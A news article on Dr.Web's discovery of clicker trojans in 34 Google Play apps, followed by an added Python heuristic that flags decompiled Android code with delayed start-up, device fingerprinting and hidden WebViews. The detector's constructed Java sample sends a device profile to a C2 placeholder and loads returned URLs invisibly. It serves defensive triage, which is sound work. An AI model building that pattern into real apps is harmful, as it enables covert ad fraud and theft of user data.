
Trojanized apps containing ad fraud malware downloaded 102M times

Two related ad fraud malware programs, recently discovered in 34 trojanized Android applications, have already been downloaded roughly 102 million times from the Google Play store, researchers reported.

Dubbed Android.Click.312.origin and Android.Click.313.origin, the malicious clicker trojans appear to be designed primarily to sign users up for paid premium services without their consent, according to a blog post published last week by researchers at the Russian antivirus company Dr.Web.

The malware has been found in a wide variety of otherwise normal-looking, fully working apps, including maps, QR code readers, dictionaries, fitness trackers, route finders, text editors, Muslim-centric apps and more. The blog post republishes a series of user complaints about the apps, all written in Cyrillic, which suggests the attackers are targeting Russian-speaking users.

After its initial launch, Android.Click.312.origin (and its modified variant, Android.Click.313.origin) waits eight hours before starting any malicious activity, a delay intended to keep it under the radar. Once active, it sends a profile of the device to its command-and-control server: manufacturer and model, operating system version, country of residence and default system language, user-agent ID, mobile carrier, internet connection type, display parameters, time zone, and data on the host application that carried the trojan in the first place.

"In response, Android.Click.312.origin receives website addresses to open in an invisible WebView, as well as links to load in a browser or on Google Play," the blog post said. "Thus, depending on the settings of the command and control server and the instructions it sends, the trojan can not only advertise applications on Google Play, but also covertly load any websites, including advertisements (even videos) or other dubious content." Because those pages load out of the user's sight, the trojan can subscribe victims to premium services without their knowledge or confirmation.
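The behaviour described in the two paragraphs above (a long start-up delay, a device profile sent to a C2 server, and C2-supplied URLs loaded in a hidden WebView) is a pattern an analyst can triage for statically in decompiled Android sources. The script below is an added example, not code from the Dr.Web report or from the trojan; it scores Java-like source for those three traits. The specific Android API calls it looks for (`postDelayed`, `setExact`, `setVisibility(View.GONE)`, `loadUrl` with a non-literal argument, `Build.*`, `TelephonyManager` and locale lookups) are assumed indicators of how such behaviour typically appears in decompiled code; the report does not name the APIs the trojan uses. Both input samples are constructed for the example.

```python
"""Heuristic triage of decompiled Android source for clicker-trojan traits.

Added example; the API names below are assumed indicators, not taken from the
Dr.Web report. Intended to run over the output of a decompiler (jadx, etc.).
"""
import re

ONE_HOUR_MS = 60 * 60 * 1000

# Device-profile lookups that commonly feed a C2 "beacon" (assumed indicators).
FINGERPRINT_APIS = [
    "Build.MANUFACTURER", "Build.MODEL", "Build.VERSION.RELEASE",
    "getNetworkOperatorName", "getSimCountryIso", "Locale.getDefault",
    "TimeZone.getDefault", "getDisplayMetrics", "getActiveNetworkInfo",
    "http.agent",
]

SCHED_RE = re.compile(r"\b(?:postDelayed|setExact|setExactAndAllowWhileIdle|"
                      r"setRepeating|schedule|setInitialDelay)\s*\(")
INT_RE = re.compile(r"\b(\d[\d_]*)L?\b")
HOURS_RE = re.compile(r"TimeUnit\.HOURS\.toMillis\(\s*(\d+)\s*\)")
HIDDEN_RE = re.compile(r"setVisibility\s*\(\s*(?:View\.)?(?:GONE|INVISIBLE)\s*\)")
ZERO_LAYOUT_RE = re.compile(r"LayoutParams\s*\(\s*0\s*,\s*0\s*\)")
LOADURL_RE = re.compile(r"\bloadUrl\s*\(\s*([^)]*?)\s*\)")
JS_RE = re.compile(r"setJavaScriptEnabled\s*\(\s*true\s*\)")


def longest_scheduled_delay_hours(source: str) -> float:
    """Largest delay (in hours) passed to a scheduling call; 0.0 if none."""
    best = 0.0
    # Split on ';' rather than newlines so a call spanning lines is one unit.
    for stmt in source.split(";"):
        if not SCHED_RE.search(stmt):
            continue
        for h in HOURS_RE.findall(stmt):            # TimeUnit.HOURS.toMillis(8)
            best = max(best, float(h))
        for lit in INT_RE.findall(stmt):            # raw millisecond literals
            ms = int(lit.replace("_", ""))
            if ms >= ONE_HOUR_MS:
                best = max(best, ms / ONE_HOUR_MS)
    return best


def analyze(source: str) -> dict:
    """Return the individual findings plus a coarse verdict for one source file."""
    delay_hours = longest_scheduled_delay_hours(source)
    # File-level co-occurrence: a WebView is created and something is hidden or
    # zero-sized. Coarse on purpose; a reviewer confirms by reading the class.
    hidden_webview = "WebView" in source and bool(
        HIDDEN_RE.search(source) or ZERO_LAYOUT_RE.search(source))
    # loadUrl() whose argument is not a string literal: URL came from elsewhere
    # (for a clicker, from the C2 response).
    dynamic_url = any(arg and not arg.startswith('"')
                      for arg in LOADURL_RE.findall(source))
    js_enabled = bool(JS_RE.search(source))
    fingerprint = [api for api in FINGERPRINT_APIS if api in source]

    score = 0
    score += 1 if delay_hours >= 1.0 else 0
    score += 2 if hidden_webview else 0
    score += 1 if dynamic_url else 0
    score += 1 if js_enabled else 0
    score += 1 if len(fingerprint) >= 3 else 0
    verdict = "suspicious" if score >= 4 else "review" if score >= 2 else "clean"
    return {"delay_hours": delay_hours, "hidden_webview": hidden_webview,
            "dynamic_url": dynamic_url, "js_enabled": js_enabled,
            "fingerprint_apis": fingerprint, "score": score, "verdict": verdict}


# Constructed sample: what a clicker module might look like after decompilation.
SUSPICIOUS_SAMPLE = """
public class Loader {
    void start(Context ctx, Handler handler) {
        handler.postDelayed(() -> beacon(ctx), 28800000L);
    }
    void beacon(Context ctx) {
        JSONObject j = new JSONObject();
        j.put("man", Build.MANUFACTURER);
        j.put("model", Build.MODEL);
        j.put("os", Build.VERSION.RELEASE);
        j.put("lang", Locale.getDefault().getLanguage());
        j.put("tz", TimeZone.getDefault().getID());
        j.put("op", tm.getNetworkOperatorName());
        j.put("ua", System.getProperty("http.agent"));
        String[] urls = post(C2, j);
        WebView w = new WebView(ctx);
        w.getSettings().setJavaScriptEnabled(true);
        w.setVisibility(View.GONE);
        for (String u : urls) w.loadUrl(u);
    }
}
"""

# Constructed sample: an ordinary in-app help screen.
BENIGN_SAMPLE = """
public class HelpActivity extends Activity {
    void show() {
        webView.getSettings().setJavaScriptEnabled(true);
        webView.setVisibility(View.VISIBLE);
        webView.loadUrl("https://example.com/help");
    }
}
"""

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, analyze(src))
```

The heuristics are deliberately loose (file-level co-occurrence, no constant propagation, so a delay stored in a named constant is missed); they are meant to rank decompiled classes for manual review, not to give a verdict on their own.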

Dr.Web said that Google removed "some applications" from its store after being informed of the threat; however, as of Aug. 8, "most applications still contained a malicious module and remained available for download."

Bradley Barth

As director of community content at CyberRisk Alliance, Bradley Barth develops content for SC Media online conferences and events, as well as video/multimedia projects. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.
